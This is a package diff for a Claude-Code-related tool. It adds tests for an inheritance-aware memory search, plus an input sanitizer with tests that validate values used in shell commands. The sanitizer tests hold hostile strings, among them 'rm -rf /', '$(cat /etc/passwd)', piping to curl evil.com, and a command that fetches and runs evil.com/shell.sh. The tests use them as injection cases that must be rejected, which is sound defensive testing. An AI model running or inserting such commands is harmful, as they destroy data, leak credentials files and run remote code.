tlc-claude-code 1.8.5 → 2.1.0

package/server/lib/inherited-search.test.js

@@ -0,0 +1,343 @@
+/**
+ * Inherited Search Tests
+ *
+ * Tests for inheritance-aware semantic search that wraps semantic-recall
+ * to search across project and workspace scopes with score adjustment,
+ * deduplication, and auto-widening.
+ *
+ * @module inherited-search.test
+ */
+
+import { describe, it, beforeEach, afterEach, expect, vi } from 'vitest';
+import { createInheritedSearch } from './inherited-search.js';
+
+/**
+ * Creates a mock semantic recall instance with vi.fn() methods.
+ * @returns {object} Mock semantic recall
+ */
+function createMockSemanticRecall() {
+  return {
+    recall: vi.fn().mockResolvedValue([]),
+    recallForContext: vi.fn().mockResolvedValue([]),
+  };
+}
+
+/**
+ * Creates a mock workspace detector instance.
+ * @returns {object} Mock workspace detector
+ */
+function createMockWorkspaceDetector() {
+  return {
+    detectWorkspace: vi.fn().mockReturnValue({
+      isInWorkspace: true,
+      workspaceRoot: '/ws',
+      projectPath: '/ws/my-project',
+      relativeProjectPath: 'my-project',
+    }),
+  };
+}
+
+/**
+ * Creates a mock vector indexer instance.
+ * @returns {object} Mock vector indexer
+ */
+function createMockVectorIndexer() {
+  return {
+    indexAll: vi.fn().mockResolvedValue({ indexed: 0, skipped: 0, errors: 0 }),
+    indexFile: vi.fn().mockResolvedValue({ success: true }),
+    indexChunk: vi.fn().mockResolvedValue({ success: true }),
+    isIndexed: vi.fn().mockResolvedValue(false),
+    rebuildIndex: vi.fn().mockResolvedValue(undefined),
+  };
+}
+
+/**
+ * Creates a mock search result.
+ * @param {object} overrides - Properties to override
+ * @returns {object} Mock search result matching semantic-recall output shape
+ */
+function createResult(overrides = {}) {
+  return {
+    id: 'mem-1',
+    text: 'Some memory text',
+    score: 0.85,
+    type: 'decision',
+    source: {
+      project: 'my-project',
+      workspace: '/ws/my-project',
+      branch: 'main',
+      sourceFile: 'decisions/something.md',
+    },
+    date: Date.now() - 86400000,
+    permanent: false,
+    ...overrides,
+  };
+}
+
+describe('inherited-search', () => {
+  let mockSemanticRecall;
+  let mockWorkspaceDetector;
+  let mockVectorIndexer;
+  let search;
+
+  beforeEach(() => {
+    mockSemanticRecall = createMockSemanticRecall();
+    mockWorkspaceDetector = createMockWorkspaceDetector();
+    mockVectorIndexer = createMockVectorIndexer();
+    search = createInheritedSearch({
+      semanticRecall: mockSemanticRecall,
+      workspaceDetector: mockWorkspaceDetector,
+      vectorIndexer: mockVectorIndexer,
+    });
+  });
+
+  afterEach(() => {
+    vi.restoreAllMocks();
+  });
+
+  describe('search', () => {
+    it('project-scope search returns project memories only', async () => {
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.90 }),
+        createResult({ id: 'p-2', score: 0.80 }),
+        createResult({ id: 'p-3', score: 0.70 }),
+      ];
+      mockSemanticRecall.recall.mockResolvedValue(projectResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'project' });
+
+      // Should call recall with scope 'project'
+      expect(mockSemanticRecall.recall).toHaveBeenCalledWith(
+        'query',
+        context,
+        expect.objectContaining({ scope: 'project' }),
+      );
+      // Should return project results unmodified (no score adjustment)
+      expect(results).toHaveLength(3);
+      expect(results[0].id).toBe('p-1');
+      expect(results[0].score).toBe(0.90);
+    });
+
+    it('auto-widens to workspace when project returns < 3 results', async () => {
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.90 }),
+        createResult({ id: 'p-2', score: 0.80 }),
+      ];
+      const workspaceResults = [
+        createResult({ id: 'ws-1', score: 0.75 }),
+        createResult({ id: 'ws-2', score: 0.65 }),
+        createResult({ id: 'ws-3', score: 0.55 }),
+      ];
+
+      // First call (project scope) returns < 3 results
+      // Second call (workspace scope) returns more results
+      mockSemanticRecall.recall
+        .mockResolvedValueOnce(projectResults)
+        .mockResolvedValueOnce(workspaceResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'project' });
+
+      // Should have called recall twice: once for project, once for workspace
+      expect(mockSemanticRecall.recall).toHaveBeenCalledTimes(2);
+      expect(mockSemanticRecall.recall).toHaveBeenNthCalledWith(
+        1,
+        'query',
+        context,
+        expect.objectContaining({ scope: 'project' }),
+      );
+      expect(mockSemanticRecall.recall).toHaveBeenNthCalledWith(
+        2,
+        'query',
+        expect.anything(),
+        expect.objectContaining({ scope: 'workspace' }),
+      );
+
+      // Should include both project results (full score) and workspace results (0.8x)
+      expect(results.length).toBeGreaterThan(2);
+    });
+
+    it('workspace results scored 0.8x lower than project results', async () => {
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.90 }),
+      ];
+      const workspaceResults = [
+        createResult({ id: 'ws-1', score: 0.80 }),
+      ];
+
+      mockSemanticRecall.recall
+        .mockResolvedValueOnce(projectResults)
+        .mockResolvedValueOnce(workspaceResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'project' });
+
+      // Project result keeps original score
+      const projectResult = results.find((r) => r.id === 'p-1');
+      expect(projectResult.score).toBe(0.90);
+
+      // Workspace result gets 0.8x multiplier
+      const wsResult = results.find((r) => r.id === 'ws-1');
+      expect(wsResult.score).toBeCloseTo(0.80 * 0.8, 5);
+    });
+
+    it('explicit inherited scope searches both project and workspace', async () => {
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.90 }),
+        createResult({ id: 'p-2', score: 0.85 }),
+        createResult({ id: 'p-3', score: 0.80 }),
+      ];
+      const workspaceResults = [
+        createResult({ id: 'ws-1', score: 0.75 }),
+      ];
+
+      mockSemanticRecall.recall
+        .mockResolvedValueOnce(projectResults)
+        .mockResolvedValueOnce(workspaceResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'inherited' });
+
+      // Should always call recall twice for inherited scope
+      expect(mockSemanticRecall.recall).toHaveBeenCalledTimes(2);
+      expect(mockSemanticRecall.recall).toHaveBeenNthCalledWith(
+        1,
+        'query',
+        context,
+        expect.objectContaining({ scope: 'project' }),
+      );
+      expect(mockSemanticRecall.recall).toHaveBeenNthCalledWith(
+        2,
+        'query',
+        expect.anything(),
+        expect.objectContaining({ scope: 'workspace' }),
+      );
+
+      // All results should be present (project at full score, workspace at 0.8x)
+      expect(results).toHaveLength(4);
+    });
+
+    it('deduplication across scopes keeps higher-scoring entry', async () => {
+      // Same id appears in both project (high score) and workspace (lower score after 0.8x)
+      const projectResults = [
+        createResult({ id: 'shared-1', score: 0.70 }),
+      ];
+      const workspaceResults = [
+        createResult({ id: 'shared-1', score: 0.95 }), // after 0.8x = 0.76
+      ];
+
+      mockSemanticRecall.recall
+        .mockResolvedValueOnce(projectResults)
+        .mockResolvedValueOnce(workspaceResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'inherited' });
+
+      // Should have only one entry for shared-1
+      const shared = results.filter((r) => r.id === 'shared-1');
+      expect(shared).toHaveLength(1);
+
+      // Workspace version after 0.8x = 0.76, project version = 0.70
+      // The workspace version (0.76) should win because it's higher after multiplier
+      expect(shared[0].score).toBeCloseTo(0.95 * 0.8, 5);
+    });
+
+    it('standalone project does not search workspace', async () => {
+      // Workspace detector returns standalone (not in workspace)
+      mockWorkspaceDetector.detectWorkspace.mockReturnValue({
+        isInWorkspace: false,
+        workspaceRoot: null,
+        projectPath: '/standalone-project',
+        relativeProjectPath: null,
+      });
+
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.90 }),
+      ];
+      mockSemanticRecall.recall.mockResolvedValue(projectResults);
+
+      const context = { projectId: 'my-project', workspace: '/standalone-project' };
+      const results = await search.search('query', context, { scope: 'inherited' });
+
+      // For standalone projects, should only call recall once (project scope only)
+      expect(mockSemanticRecall.recall).toHaveBeenCalledTimes(1);
+      expect(results).toHaveLength(1);
+      expect(results[0].id).toBe('p-1');
+    });
+
+    it('combined ranking sorts correctly across scopes', async () => {
+      const projectResults = [
+        createResult({ id: 'p-1', score: 0.60 }),
+        createResult({ id: 'p-2', score: 0.50 }),
+      ];
+      const workspaceResults = [
+        createResult({ id: 'ws-1', score: 0.90 }), // after 0.8x = 0.72
+        createResult({ id: 'ws-2', score: 0.70 }), // after 0.8x = 0.56
+      ];
+
+      mockSemanticRecall.recall
+        .mockResolvedValueOnce(projectResults)
+        .mockResolvedValueOnce(workspaceResults);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'inherited' });
+
+      // Expected order: ws-1(0.72), p-1(0.60), ws-2(0.56), p-2(0.50)
+      expect(results).toHaveLength(4);
+      for (let i = 0; i < results.length - 1; i++) {
+        expect(results[i].score).toBeGreaterThanOrEqual(results[i + 1].score);
+      }
+      expect(results[0].id).toBe('ws-1');
+      expect(results[1].id).toBe('p-1');
+      expect(results[2].id).toBe('ws-2');
+      expect(results[3].id).toBe('p-2');
+    });
+
+    it('returns empty when no results from any scope', async () => {
+      mockSemanticRecall.recall.mockResolvedValue([]);
+
+      const context = { projectId: 'my-project', workspace: '/ws/my-project' };
+      const results = await search.search('query', context, { scope: 'inherited' });
+
+      expect(results).toEqual([]);
+    });
+  });
+
+  describe('indexAll', () => {
+    it('processes workspace memory path when in workspace', async () => {
+      mockWorkspaceDetector.detectWorkspace.mockReturnValue({
+        isInWorkspace: true,
+        workspaceRoot: '/ws',
+        projectPath: '/ws/my-project',
+        relativeProjectPath: 'my-project',
+      });
+
+      mockVectorIndexer.indexAll.mockResolvedValue({ indexed: 5, skipped: 0, errors: 0 });
+
+      const result = await search.indexAll('/ws/my-project');
+
+      // Should index both the project path and the workspace root
+      expect(mockVectorIndexer.indexAll).toHaveBeenCalledTimes(2);
+      expect(mockVectorIndexer.indexAll).toHaveBeenCalledWith('/ws/my-project');
+      expect(mockVectorIndexer.indexAll).toHaveBeenCalledWith('/ws');
+    });
+
+    it('processes only project path for standalone', async () => {
+      mockWorkspaceDetector.detectWorkspace.mockReturnValue({
+        isInWorkspace: false,
+        workspaceRoot: null,
+        projectPath: '/standalone-project',
+        relativeProjectPath: null,
+      });
+
+      mockVectorIndexer.indexAll.mockResolvedValue({ indexed: 3, skipped: 0, errors: 0 });
+
+      const result = await search.indexAll('/standalone-project');
+
+      // Should only index the project path (no workspace)
+      expect(mockVectorIndexer.indexAll).toHaveBeenCalledTimes(1);
+      expect(mockVectorIndexer.indexAll).toHaveBeenCalledWith('/standalone-project');
+    });
+  });
+});

package/server/lib/input-sanitizer.js

@@ -0,0 +1,86 @@
+/**
+ * Input Sanitizer — validation for user-supplied values used in shell commands
+ * Phase 80 Review Fix
+ */
+
+/** Strict DNS hostname pattern */
+const DOMAIN_RE = /^[a-z0-9]([a-z0-9-]*[a-z0-9])?(\.[a-z0-9]([a-z0-9-]*[a-z0-9])?)*$/i;
+
+/** Safe git branch pattern (allows slashes, dots, dashes, underscores) */
+const BRANCH_RE = /^[a-zA-Z0-9._\/-]+$/;
+
+/** Safe git repo URL pattern (git@... or https://...) */
+const REPO_URL_RE = /^(git@[\w.-]+:[\w./-]+\.git|https?:\/\/[\w.-]+(\/[\w./-]+)*(\.git)?)$/;
+
+/** Safe unix username pattern */
+const USERNAME_RE = /^[a-z_][a-z0-9_-]*$/;
+
+/** Safe project name pattern */
+const PROJECT_NAME_RE = /^[a-zA-Z0-9._-]+$/;
+
+/**
+ * Validate a DNS hostname/domain
+ * @param {string} domain
+ * @returns {boolean}
+ */
+function isValidDomain(domain) {
+  if (!domain || typeof domain !== 'string') return false;
+  if (domain.length > 253) return false;
+  return DOMAIN_RE.test(domain);
+}
+
+/**
+ * Validate a git branch name
+ * @param {string} branch
+ * @returns {boolean}
+ */
+function isValidBranch(branch) {
+  if (!branch || typeof branch !== 'string') return false;
+  if (branch.length > 255) return false;
+  if (branch.includes('..')) return false;
+  return BRANCH_RE.test(branch);
+}
+
+/**
+ * Validate a git repo URL
+ * @param {string} url
+ * @returns {boolean}
+ */
+function isValidRepoUrl(url) {
+  if (!url || typeof url !== 'string') return false;
+  return REPO_URL_RE.test(url);
+}
+
+/**
+ * Validate a unix username
+ * @param {string} username
+ * @returns {boolean}
+ */
+function isValidUsername(username) {
+  if (!username || typeof username !== 'string') return false;
+  if (username.length > 32) return false;
+  return USERNAME_RE.test(username);
+}
+
+/**
+ * Validate a project name (used in file paths)
+ * @param {string} name
+ * @returns {boolean}
+ */
+function isValidProjectName(name) {
+  if (!name || typeof name !== 'string') return false;
+  if (name.length > 128) return false;
+  if (name.includes('..') || name.includes('/')) return false;
+  return PROJECT_NAME_RE.test(name);
+}
+
+module.exports = {
+  isValidDomain,
+  isValidBranch,
+  isValidRepoUrl,
+  isValidUsername,
+  isValidProjectName,
+  DOMAIN_RE,
+  BRANCH_RE,
+  REPO_URL_RE,
+};

package/server/lib/input-sanitizer.test.js

@@ -0,0 +1,117 @@
+import { describe, it, expect } from 'vitest';
+
+const { isValidDomain, isValidBranch, isValidRepoUrl, isValidUsername, isValidProjectName } = await import('./input-sanitizer.js');
+
+describe('Input Sanitizer', () => {
+  describe('isValidDomain', () => {
+    it('accepts valid domains', () => {
+      expect(isValidDomain('example.com')).toBe(true);
+      expect(isValidDomain('myapp.dev')).toBe(true);
+      expect(isValidDomain('sub.domain.example.com')).toBe(true);
+      expect(isValidDomain('a.io')).toBe(true);
+    });
+
+    it('rejects domains with shell metacharacters', () => {
+      expect(isValidDomain('example.com; rm -rf /')).toBe(false);
+      expect(isValidDomain('example.com`whoami`')).toBe(false);
+      expect(isValidDomain('example.com$(cat /etc/passwd)')).toBe(false);
+      expect(isValidDomain('example.com | curl evil.com')).toBe(false);
+    });
+
+    it('rejects nginx injection attempts', () => {
+      expect(isValidDomain('myapp.dev; include /etc/passwd;')).toBe(false);
+      expect(isValidDomain('myapp.dev\nserver_name evil.com')).toBe(false);
+    });
+
+    it('rejects empty/null/undefined', () => {
+      expect(isValidDomain('')).toBe(false);
+      expect(isValidDomain(null)).toBe(false);
+      expect(isValidDomain(undefined)).toBe(false);
+    });
+  });
+
+  describe('isValidBranch', () => {
+    it('accepts valid branch names', () => {
+      expect(isValidBranch('main')).toBe(true);
+      expect(isValidBranch('feature/login')).toBe(true);
+      expect(isValidBranch('fix-bug-123')).toBe(true);
+      expect(isValidBranch('release/v1.0.0')).toBe(true);
+    });
+
+    it('rejects branches with shell metacharacters', () => {
+      expect(isValidBranch('main; rm -rf /')).toBe(false);
+      expect(isValidBranch('main`whoami`')).toBe(false);
+      expect(isValidBranch('main$(cat /etc/passwd)')).toBe(false);
+      expect(isValidBranch('main | curl evil.com')).toBe(false);
+    });
+
+    it('rejects path traversal', () => {
+      expect(isValidBranch('../../../etc/passwd')).toBe(false);
+    });
+
+    it('rejects empty/null', () => {
+      expect(isValidBranch('')).toBe(false);
+      expect(isValidBranch(null)).toBe(false);
+    });
+  });
+
+  describe('isValidRepoUrl', () => {
+    it('accepts valid git URLs', () => {
+      expect(isValidRepoUrl('git@github.com:user/repo.git')).toBe(true);
+      expect(isValidRepoUrl('https://github.com/user/repo.git')).toBe(true);
+      expect(isValidRepoUrl('https://github.com/user/repo')).toBe(true);
+    });
+
+    it('rejects injection attempts', () => {
+      expect(isValidRepoUrl('; curl evil.com/shell.sh | bash;')).toBe(false);
+      expect(isValidRepoUrl('git@github.com:user/repo.git; rm -rf /')).toBe(false);
+      expect(isValidRepoUrl('$(whoami)')).toBe(false);
+    });
+
+    it('rejects empty/null', () => {
+      expect(isValidRepoUrl('')).toBe(false);
+      expect(isValidRepoUrl(null)).toBe(false);
+    });
+  });
+
+  describe('isValidUsername', () => {
+    it('accepts valid usernames', () => {
+      expect(isValidUsername('deploy')).toBe(true);
+      expect(isValidUsername('_admin')).toBe(true);
+      expect(isValidUsername('deploy-user')).toBe(true);
+    });
+
+    it('rejects injection attempts', () => {
+      expect(isValidUsername('deploy; rm -rf /')).toBe(false);
+      expect(isValidUsername('deploy`whoami`')).toBe(false);
+    });
+
+    it('rejects empty/null', () => {
+      expect(isValidUsername('')).toBe(false);
+      expect(isValidUsername(null)).toBe(false);
+    });
+  });
+
+  describe('isValidProjectName', () => {
+    it('accepts valid project names', () => {
+      expect(isValidProjectName('myapp')).toBe(true);
+      expect(isValidProjectName('my-app')).toBe(true);
+      expect(isValidProjectName('my_app.v2')).toBe(true);
+    });
+
+    it('rejects path traversal', () => {
+      expect(isValidProjectName('../etc/passwd')).toBe(false);
+      expect(isValidProjectName('foo/bar')).toBe(false);
+    });
+
+    it('rejects injection attempts', () => {
+      expect(isValidProjectName('myapp; rm -rf /')).toBe(false);
+      expect(isValidProjectName('myapp$(whoami)')).toBe(false);
+    });
+
+    it('rejects empty/null', () => {
+      expect(isValidProjectName('')).toBe(false);
+      expect(isValidProjectName(null)).toBe(false);
+    });
+  });
+});